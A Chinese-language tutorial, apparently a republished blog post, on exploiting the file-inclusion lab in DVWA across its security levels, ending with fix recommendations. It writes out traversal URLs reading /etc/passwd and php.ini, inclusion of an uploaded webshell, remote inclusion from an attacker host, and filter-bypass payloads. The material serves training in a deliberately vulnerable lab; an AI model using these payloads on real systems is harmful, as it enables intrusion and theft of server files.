DVWA之文件包含漏洞

这篇具有很好参考价值的文章主要介绍了DVWA之文件包含漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

文件包含漏洞原理

1、什么是文件包含

程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。

2、文件包含漏洞

程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,
但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。

#动态包含和静态包含(只有动态包含才存在包含漏洞)

3、文件包含类的函数

JSP文件包含函数:java.io.file()、java.io.filereader()

#动态包含只支持包含web路径下的jsp文件。

aspc文件包含函数:incolude file、include virtual

#asp和aspx 均不支持动态包含,支持静态包含。

php文件包含函数:include include_once() require require_once() fopen() redefile()

#include() :执行到include()才包含文件,找不到包含文件只会产生警告,还会接着运行后面的脚本!

#require(): 只要程序一运行就会包含文件,找不到包含文件则会产生致命错误,并且脚本运行终止!

#include_once()和require_once()区别:如文件包含被运行了,则不会运行第二次

#redefile()函数#一般返回的是文件内容的字节数 包含漏洞不作研究

# 含文件无论后缀是什么,都会以php方式解析

文件包含漏洞类型

1.本地文件包含漏洞

本地包含顾名思义,就是在网站服务器本身存在恶意文件,然后利用本地文件包含使用

2.远程文件包含漏洞

远程文件包含就是调用其他网站的恶意文件进行打开

#要实现远程文件包含则需要 对 php.ini 进行一些配置

即allow_url_fopen和allow_url_include要为On,也就是打开状态。

DVWA之文件包含漏洞

DVWA之文件包含漏洞

DVWA之文件包含漏洞

安全级别:low

本地文件包含

页面显示三个三个文件,分别选择三个文件会跳转到三个不同的页面

DVWA之文件包含漏洞

http://192.168.245.238:88/vulnerabilities/fi/?page=file1.php
http://192.168.245.238:88/vulnerabilities/fi/?page=file2.php
http://192.168.245.238:88/vulnerabilities/fi/?page=file3.php

查看源代码属于一个GET请求通过page函数传参

DVWA之文件包含漏洞

此时漏洞点就暴露出来,此时我们可以尝试打开一些敏感文件,以 /etc/passwd/var/www/phpinfo.php文件为例,只要有足够的权限,在此处就可以打开想打开的文件。

构造请求参数

Linux系统
http://192.168.245.238:88/vulnerabilities/fi/?page=/etc/passwd   
http://192.168.245.238:88/vulnerabilities/fi/?page=/var/www/phpinfo.php  

 当构造文件不存在时直接把网站根目录暴露出来了

DVWA之文件包含漏洞

windows系统
#相对路径:http://192.168.245.238:88/vulnerabilities/fi/?page=C:\phpstudy_pro\WWW\DVWA-master\phpinfo.php
#绝对路径:http://192.168.245.238:88/vulnerabilities/fi/?page=C:\phpstudy_pro\WWW\DVWA-master\phpinfo.php

成功将代码执行,并将显示内容回显给前端 说明服务端属于windows系统

DVWA之文件包含漏洞

查看php.ini的配置信息

http://192.168.245.238/vulnerabilities/fi/?page=../../php.ini

DVWA之文件包含漏洞

 文章来源地址https://www.toymoban.com/news/detail-445185.html

漏洞利用:

方法一:本地文件包含

利用upload文件上传漏洞上传木马文件,再通过本地文件包含的方式读取木马文件达到webshell的目的

DVWA之文件包含漏洞

通过本地文件包含进行读取木马文件

http://192.168.245.238/vulnerabilities/fi/?page=../../hackable/uploads/webshell.jpg

DVWA之文件包含漏洞

方法二:远程文件包含

#攻击机和靶机在同一局域网内 互能ping通

在远程服务器192.168.245.139 网站目录做一个木马txt文件:

DVWA之文件包含漏洞

http://192.168.245.238:88/vulnerabilities/fi/?page=http://192.168.245.139/include/index1.txt

DVWA之文件包含漏洞

蚁剑工具链接:

因为DVWA有个身份验证信息需要将请求头信息配置好后才能通过蚁剑工具进行post请求连接,否则返回数据为空!

DVWA之文件包含漏洞

打开终端

DVWA之文件包含漏洞

安全级别:medium

DVWA之文件包含漏洞

与low级别相比,增加了str_place()函数,对page参数进行了一定的处理,将”http:// ”、”https://”、 ” ../”、”..\”替换为空字符,即删除。

str_replace函数会将http://删除 可以构造函数双写达到绕过

远程文件包含

http://192.168.245.238:88/vulnerabilities/fi/?page=htthttp://p://192.168.245.139/include/index1.txt

DVWA之文件包含漏洞

 本地文件包含

#绝对路径:http://192.168.245.238:88/vulnerabilities/fi/?page=C:\phpstudy_pro\WWW\DVWA-master\phpinfo.php
#相对路径:http://192.168.245.238:88/vulnerabilities/fi/?page=....//....//phpinfo.php

DVWA之文件包含漏洞

安全级别:high

DVWA之文件包含漏洞

本地文件包含

http://192.168.245.238:88/vulnerabilities/fi/?page=file://C:\phpstudy_pro\WWW\DVWA-master\phpinfo.php

DVWA之文件包含漏洞

远程文件包含

由于file协议只支持本地文件读取,不支持远程文件执行,就没办法执行远程文件(当然可以利用文件上传漏洞配合执行文件包含)

安全级别:impossible

DVWA之文件包含漏洞

DVWA之文件包含漏洞

 

文件包含漏洞的修复建议

1、输入验证:确保所有用户输入的数据都经过了适当的验证和过滤,以避免恶意输入导致的文件包含漏洞。

2、安全编码:使用安全编码实践来编写Web应用程序,例如不使用动态包含文件、限制文件路径长度、禁用不必要的功能等。

3、白名单过滤:只允许包含已知的、安全的文件类型和路径,以避免未知的文件包含漏洞。

4、服务器端包含:对于需要包含的文件,应该在服务器端进行处理,而不是将文件直接发送给客户端。这样可以避免客户端包含漏洞。

5、最小权限原则:为Web应用程序的所有文件和目录设置适当的权限,以限制攻击者获取敏感信息的能力。

6、更新软件和组件:及时更新Web应用程序所依赖的软件和组件,以修复已知的安全漏洞。

7、安全审计:定期对Web应用程序进行安全审计,以发现潜在的安全漏洞并及时修复。

到了这里,关于DVWA之文件包含漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell

    我们可以利用文件包含漏洞读取任意文件,读取文件的时候有利用条件 目标主机文件存在(目标文件的路径、绝对路径、相对路径) 具有文件可读权限 提交参数 http://localhost/include/include.php?path=C:windowssystem32driversetchosts ,读取本地host文件 提交参数 http://localhost/include/includ

    2024年02月11日
    浏览(47)
  • 文件包含漏洞及漏洞复现

    程序开发人员通常会把可重复使用函数或语句写到单个文件中,形成“封装”。在使用某个功能的时候,直接调用此文件,无需再次编写,提高代码重用性,减少代码量。这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设

    2024年02月10日
    浏览(49)
  • 文件包含漏洞利用思路

    通过 PHP 函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,导致意外的文件泄漏甚至恶意代码注入。 php中常见的文件包含函数有以下四种: include() require() include_once() require_once() include与require基本是相同的,除了错误处理方面: include(),只生成

    2024年02月16日
    浏览(37)
  • 文件包含漏洞利用和防御

    使用函数包含指定文件的代码,没对函数的参数进行过滤,可被用户控制包含恶意文件并执行代码 漏洞分类 本地文件包含:目录遍历、任意文件读取、包含日志文件getshell、图片马getshell、伪协议读取文件/命令执行、包含phpinfo上传的临时文件 远程文件包含:远程木马getshe

    2024年02月02日
    浏览(99)
  • 文件包含漏洞学习笔记

    相同内容或方法在多个页面显示或调用,文件包含漏洞又称为目录遍历漏洞或任意文件访问漏洞。分为本地文件包含(LFI:Local File Inclusion),远程文件包含(RFI:Remote File  Inclusion),也可分为静态文件包含,动态文件包含。 页面中直接引用静态文件。 main.php内容如下:

    2023年04月08日
    浏览(33)
  • 文件包含漏洞学习小结

    目录 一、介绍 二、常见文件包含函数 三、文件包含漏洞代码举例分析 四、文件包含漏洞利用方式 4.1 本地文件包含 1、读取敏感文件 2、文件包含可运行的php代码 ①包含图片码 ②包含日志文件 ③包含环境变量getshell ④临时文件包含 ⑤伪协议 4.2 远程文件包含 4.3 文件包含常

    2024年02月09日
    浏览(37)
  • pearcmd文件包含漏洞

    pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前,pecl/pear是默认安装的;在7.4及以后,需要我们在编译PHP的时候指定 --with-pear 才会安装 不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在 /usr/local/lib/php 原本pear/pcel是一个命

    2024年01月21日
    浏览(30)
  • 文件包含漏洞相关协议详解

    今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授权设备进行渗透测试! 首先,我们来介绍以下文件

    2024年02月13日
    浏览(33)
  • 文件包含漏洞讲解

    文件包含即程序通过包含函数调用本地或远程文件,以此来实现拓展功能。 本地文件包含 常见的文件包含漏洞的形式为 ?php include(\\\"inc/\\\" . $_GET[\\\'file\\\']); ? 考虑常用的几种包含方式为 同目录包含file=.htaccess 目录遍历?file=…/…/…/…/…/…/…/…/…/var/lib/locate.db 日志注入?file=…/…

    2024年01月20日
    浏览(43)
  • 文件包含漏洞

    漏洞讲解 漏洞过程解析 在使用include等包含函数时,当对包含文件的来源过滤不严格,那么会包含到恶意文件,攻击者将会通过这个恶意文件来到达他想要达到的相应目的。 引用一句网上看到的话:文件包含漏洞和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,

    2024年02月19日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包